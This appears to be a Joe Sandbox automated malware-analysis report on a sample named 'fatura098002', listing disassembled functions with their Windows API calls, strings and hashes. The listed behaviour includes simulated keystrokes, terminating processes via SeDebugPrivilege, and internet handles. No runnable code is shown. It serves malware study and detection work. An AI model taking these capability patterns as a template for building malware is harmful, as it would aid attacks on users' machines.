Part of subcall function 0077C253: GetLastError.KERNEL32 ref: 0077C322
Part of subcall function 0077C253: SetEvent.KERNEL32(?), ref: 0077C336
Part of subcall function 0077C253: InternetCloseHandle.WININET(00000000), ref: 0077C341

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: ecb816931360ce5b0881f0980032e7c03352ecea6cf0413e75ab8916d0bbd872
Instruction ID: 0dcbd8bd46c2b5aea8c664b01dedfe2efd1d171a3491c4a91affbfdc577ac6f2
Opcode Fuzzy Hash: ecb816931360ce5b0881f0980032e7c03352ecea6cf0413e75ab8916d0bbd872
Instruction Fuzzy Hash: 3B318B71200605EFDF229FA5DC48A66BBF8FF1C380B54C42EF95A86611D738E9159BA0

Function 007625A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00763A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00763A57
Part of subcall function 00763A3D: GetCurrentThreadId.KERNEL32 ref: 00763A5E
Part of subcall function 00763A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007625B3), ref: 00763A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 007625BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007625DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007625DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 007625E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00762601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00762605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0076260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00762623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00762627

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: af1a792166d00a1640fc2826904b35587b3536f5c1ee58ff2450e93408ee5158
Instruction ID: 72ace2a315746c4db0fc055b21e850490b482fd1d1578699c1ee325205ae23fb
Opcode Fuzzy Hash: af1a792166d00a1640fc2826904b35587b3536f5c1ee58ff2450e93408ee5158
Instruction Fuzzy Hash: FB012430380614BBFB206768CC8EF593F59DF4EB12F104002F319AE1D1C9EA2842CA6E

Function 00761803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00761449,?,?,00000000), ref: 0076180C
RtlAllocateHeap.NTDLL(00000000,?,00761449), ref: 00761813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00761449,?,?,00000000), ref: 00761828
GetCurrentProcess.KERNEL32(?,00000000,?,00761449,?,?,00000000), ref: 00761830
DuplicateHandle.KERNEL32(00000000,?,00761449,?,?,00000000), ref: 00761833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00761449,?,?,00000000), ref: 00761843
GetCurrentProcess.KERNEL32(00761449,00000000,?,00761449,?,?,00000000), ref: 0076184B
DuplicateHandle.KERNEL32(00000000,?,00761449,?,?,00000000), ref: 0076184E
CreateThread.KERNEL32(00000000,00000000,00761874,00000000,00000000,00000000), ref: 00761868

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
String ID:
API String ID: 1422014791-0
Opcode ID: 1524fa56dd6935361ffe9b6e578538e27e7bc9485055b3e8ff4827eeb1197ddb
Instruction ID: 9bdafcee03ee2c1d6ee44c7858b1303a22b23b48e30ee95042ba37c6a583797c
Opcode Fuzzy Hash: 1524fa56dd6935361ffe9b6e578538e27e7bc9485055b3e8ff4827eeb1197ddb
Instruction Fuzzy Hash: D501BFB5280308BFEB11AB65DD4EF5B3B6CEB89B11F418411FA05DB2A1C6749C01CB38

Function 0078A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0076D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0076D501
Part of subcall function 0076D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0076D50F
Part of subcall function 0076D4DC: CloseHandle.KERNEL32(00000000), ref: 0076D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0078A16D
GetLastError.KERNEL32 ref: 0078A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0078A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0078A268
GetLastError.KERNEL32(00000000), ref: 0078A273
CloseHandle.KERNEL32(00000000), ref: 0078A2C4

Strings

SeDebugPrivilege, xrefs: 0078A18F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 9b1d2036f0d650e9128759f7ba35c24abc8b42bd2140a40a4182f2d11c83d217
Instruction ID: 096be58c811eeb525ba03f124287e4ebeebce6033267d7f733d79f149ced5d64
Opcode Fuzzy Hash: 9b1d2036f0d650e9128759f7ba35c24abc8b42bd2140a40a4182f2d11c83d217
Instruction Fuzzy Hash: C1619F71244242EFE721EF18C498F15BBE1AF44318F18859DE4668B7A3C77AEC45CB92

Function 00793886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00793925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0079393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00793954
_wcslen.LIBCMT ref: 00793999
SendMessageW.USER32(?,00001057,00000000,?), ref: 007939C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007939F4

Strings

SysListView32, xrefs: 007938F7

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 5e2138fd156396c214aecd599a4aa5197bbe17adf1720d586f2fc44b18daf9a0
Instruction ID: db73e622d36e9e1a18a04389d29e5301e7f10bca81ed0c3199df42db78f75a2b
Opcode Fuzzy Hash: 5e2138fd156396c214aecd599a4aa5197bbe17adf1720d586f2fc44b18daf9a0
Instruction Fuzzy Hash: 8641B671A00219ABEF21DF64DC49FEA7BA9EF08354F10056AF958E7281D7799D80CB90

Function 00722D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00722D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00722D53
_ValidateLocalCookies.LIBCMT ref: 00722DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00722E0C
_ValidateLocalCookies.LIBCMT ref: 00722E61

Strings

csm, xrefs: 00722DF6
&Hr, xrefs: 00722DFE, 00722E07, 00722E18

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &Hr$csm
API String ID: 1170836740-2624131954
Opcode ID: 37ac7fd3d945a1a42cd87fe80ca86722f841a8e228d9abb5e35e400245ae8da7
Instruction ID: 86847963db5a3abc110eb6568490f66add2d6c23c55c3b7c64a5667e71d44738
Opcode Fuzzy Hash: 37ac7fd3d945a1a42cd87fe80ca86722f841a8e228d9abb5e35e400245ae8da7
Instruction Fuzzy Hash: 9E418334E00229FBCF10DF68D849A9EBBA5BF45324F148155E8156B353D739EA46CBD0

Function 0076C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0076C913

Strings

stop, xrefs: 0076C8E4
info, xrefs: 0076C8B4
warning, xrefs: 0076C8FC
blank, xrefs: 0076C895
question, xrefs: 0076C8CC

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: a71c3ee1a32fd73c004c423391a342e2b060e9879d1d73195fb7c204b1048413
Instruction ID: b8626778817fa9e7e30473f6ac74a8b68f062933c328ec9b63f7d807d388e3f2
Opcode Fuzzy Hash: a71c3ee1a32fd73c004c423391a342e2b060e9879d1d73195fb7c204b1048413
Instruction Fuzzy Hash: 3B11EB31689307BEE7079B54EC82DBA77ACDF15354B10442FFD45B6182E77C6D005268

Function 0076ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0076ED2A
_wcslen.LIBCMT ref: 0076ED3B
_wcslen.LIBCMT ref: 0076ED79
_wcslen.LIBCMT ref: 0076EDAF
_wcslen.LIBCMT ref: 0076EDDF
_wcslen.LIBCMT ref: 0076EDEF
_wcslen.LIBCMT ref: 0076EE2B
_wcslen.LIBCMT ref: 0076EE5A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 7363f1402170ffaffbd9d018d4c138f2778207ea2bbb089029ab747344389db5
Instruction ID: 856d120efab0fbac2be38d14af8a2106b9973fd9f608d536046476692f565d09
Opcode Fuzzy Hash: 7363f1402170ffaffbd9d018d4c138f2778207ea2bbb089029ab747344389db5
Instruction Fuzzy Hash: B341A266C10228F5DB11EBF4988E9CFB7E8AF45310F508466E919E3122FB3CE645C3A5

Function 0071F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0071F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0075F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0075F454

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2401d1a2b1cb3b145bbded8364c0454772fd690d7376c581ecb03c3464b82545
Instruction ID: e9a27ea539262d2f1763f259456e58b12cc118c852ba33a1bed6a4ffff9446cd
Opcode Fuzzy Hash: 2401d1a2b1cb3b145bbded8364c0454772fd690d7376c581ecb03c3464b82545
Instruction Fuzzy Hash: 03413B31608680BEDB35BB2DC8887EA7B91AB46321F58843DE447D65E0C67DB8C5CB11

Function 00792D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00792D1B
GetDC.USER32(00000000), ref: 00792D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00792D2E
ReleaseDC.USER32(00000000,00000000), ref: 00792D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00792D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00792D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00795A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00792DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00792DE1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 634a25489a0ee486c357d5b6ae2562c5c8226bba9c19b8c4e56a19ec79c71448
Instruction ID: 8447b848d35725bca33094112023729ee1646bf39fcc83938b6d65f7ed034ba6
Opcode Fuzzy Hash: 634a25489a0ee486c357d5b6ae2562c5c8226bba9c19b8c4e56a19ec79c71448
Instruction Fuzzy Hash: 8C317C72201214BFEF158F54DC8AFEB3BA9EF09715F048056FE089A291C6799C52CBB4

Function 00765622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00765637
_memcmp.LIBVCRUNTIME ref: 00765659
_memcmp.LIBVCRUNTIME ref: 00765671
_memcmp.LIBVCRUNTIME ref: 00765684
_memcmp.LIBVCRUNTIME ref: 0076569E
_memcmp.LIBVCRUNTIME ref: 007656B1
_memcmp.LIBVCRUNTIME ref: 007656C9
_memcmp.LIBVCRUNTIME ref: 007656E4

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e6f01c9c9030353040ce0c36037365731a0eec829abc133864cb8e94b6b38a87
Instruction ID: fd8a5b8d7bc634fa574ad40e795c532d3b4e672e625b11998e9445ed9b85020e
Opcode Fuzzy Hash: e6f01c9c9030353040ce0c36037365731a0eec829abc133864cb8e94b6b38a87
Instruction Fuzzy Hash: F821CCA1640915B7D6149520ED86FFA335DBF31794F444020FD06AA642F72CEE24D6B5

Function 00784FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00785007
NULL Pointer assignment, xrefs: 0078502E, 00785383

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 191930e8c1a605e045f4b627d260983786525e8f1c6caad1a83f557373e3b61a
Instruction ID: 5c31be95a8aaa73bb6def6554f9cd20013f1b4b2d34658536c01af1e5f5df815
Opcode Fuzzy Hash: 191930e8c1a605e045f4b627d260983786525e8f1c6caad1a83f557373e3b61a
Instruction Fuzzy Hash: 5CD1D271A4060A9FDF10DFA8C885BAEB7B5BF48354F148069E915EB281E774DD41CB90

Function 00741522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,007417FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 007415CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00741651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,007417FB,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007416E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007416FB

Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444), ref: 00733852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00741777
__freea.LIBCMT ref: 007417A2
__freea.LIBCMT ref: 007417AE

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: d028e08f0a2608723cf43bd6b84ec53d629271b46ecf59ad797cc1182c3d7d4d
Instruction ID: dd5dfa483631979d1a5633e182ef60e48ee0e4db5ce0b9307b59cd1dbf559466
Opcode Fuzzy Hash: d028e08f0a2608723cf43bd6b84ec53d629271b46ecf59ad797cc1182c3d7d4d
Instruction Fuzzy Hash: 1491D571E002169ADF21AE74CC85AFEBBB59F49350F984659E805E7141EB3DCDC0CB61

Function 00784523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00784648
VariantInit.OLEAUT32(?), ref: 00784749
VariantClear.OLEAUT32(?), ref: 00784753
VariantClear.OLEAUT32(?), ref: 007847B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 007845D8, 00784706, 007847BE
Incorrect Object type in FOR..IN loop, xrefs: 0078472C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

